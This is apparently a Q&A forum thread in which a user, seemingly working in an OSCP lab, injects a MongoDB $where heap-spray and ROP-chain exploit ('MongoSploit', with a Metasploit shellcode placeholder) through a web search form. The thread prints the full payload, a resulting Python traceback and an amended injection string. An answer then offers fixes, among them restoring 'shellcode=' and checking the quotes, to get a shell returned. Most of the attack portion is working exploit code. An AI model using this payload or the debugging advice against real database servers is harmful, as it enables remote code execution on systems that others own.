# Shellcode in MongoDB Python code

Tags: exploit, python, shellcode, mongodb

I know I can input this into a search box that queries the MongoDB. I have updated the code with my shell code, but I won't include that, I will just use the exploit as it is here:

```
db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);'})
```

When this gets entered into the DB, I get a python error, which looks like this:

```
     /usr/lib/cgi-bin/mongo/2.2.3/dbparse.py in ()
     41 print "</th>"
     42 if where:
=>   43    for record in collection.find(where):
     44         print "<tr>"
     45         print "<td align=\"center\">"+record["CompanyName"]+"</td>"
record undefined, collection = Collection(Database(MongoClient('localhost', 27017), u'test_database'), u'london_garages'), collection.find = <bound method Collection.find of Collection(Data...', 27017), u'test_database'), u'london_garages')>, where = {'$where': 'this.CompanyName == \'db.my_collection.find({\'$wh...x08"+"\\x20\\x20\\x20\\x20"+"\\x58\\x71\\x45\\x08"]);\'})\''}
 /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in next(self=<pymongo.cursor.Cursor object>)
    812             raise StopIteration
    813         db = self.__collection.database
=>  814         if len(self.__data) or self._refresh():
    815             if self.__manipulate:
    816                 return db._fix_outgoing(self.__data.popleft(),
builtin len = <built-in function len>, self = <pymongo.cursor.Cursor object>, self.__data undefined, self._refresh = <bound method Cursor._refresh of <pymongo.cursor.Cursor object>>
 /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in _refresh(self=<pymongo.cursor.Cursor object>)
    761                               self.__skip, ntoreturn,
    762                               self.__query_spec(), self.__fields,
=>  763                               self.__uuid_subtype))
    764             if not self.__id:
    765                 self.__killed = True
self = <pymongo.cursor.Cursor object>, self.__uuid_subtype undefined
 /usr/local/lib/python2.7/dist-packages/pymongo/cursor.py in __send_message(self=<pymongo.cursor.Cursor object>, message=(-720441271, '\xb1\x03\x00\x00I\xf0\x0e\xd5\x00\x00\x00\x00\xd4\x07\x00\x00\x00\x00\x00\x00test_database.london_garages...8"+"\\x20\\x20\\x20\\x20"+"\\x58\\x71\\x45\\x08"]);\'})\'\x00\x00', 888))
    718                                                 self.__as_class,
    719                                                 self.__tz_aware,
=>  720                                                 self.__uuid_subtype)
    721         except AutoReconnect:
    722             # Don't send kill cursors to another server after a "not master"
self = <pymongo.cursor.Cursor object>, self.__uuid_subtype undefined
 /usr/local/lib/python2.7/dist-packages/pymongo/helpers.py in _unpack_response(response="\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00.\x00\x00\x00\x02$err\x00\x15\x00\x00\x00$where compile error\x00\x10code\x00V'\x00\x00\x00", cursor_id=None, as_class=<type 'dict'>, tz_aware=False, uuid_subtype=3)
     97             raise AutoReconnect(error_object["$err"])
     98         raise OperationFailure("database error: %s" %
=>   99                                error_object["$err"])
    100 
    101     result = {}
error_object = {u'$err': u'$where compile error', u'code': 10070}
```

I understand that this is an error related to the fact that the database is already performing some of the functionality in the front of my input, so I amended this to look like this:

```
    unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to be"+"\x6c\x5a\x05\x08"+"\x20\x20\x20\x20"+"\x58\x71\x45\x08"]);
```

This doesn't return an error, but the shell isn't returned. Could I be forgetting some characters here that prevent my code from executing? Another concern I have is that the assignment to shellcode, when removed, may impact other areas of the code, for instance where shellcode is called again for `testarray`.

Answer (score 2):

Looking at the error, I'm pretty sure you that this is related to one of the OSCP Lab machines. You could get more help if you post these issues on the forum, but here some tips:

- "shellcode=" is missing on you payload
- Check single and double quotes

Comment: He says "I have updated the code with my shell code  but I won't include that"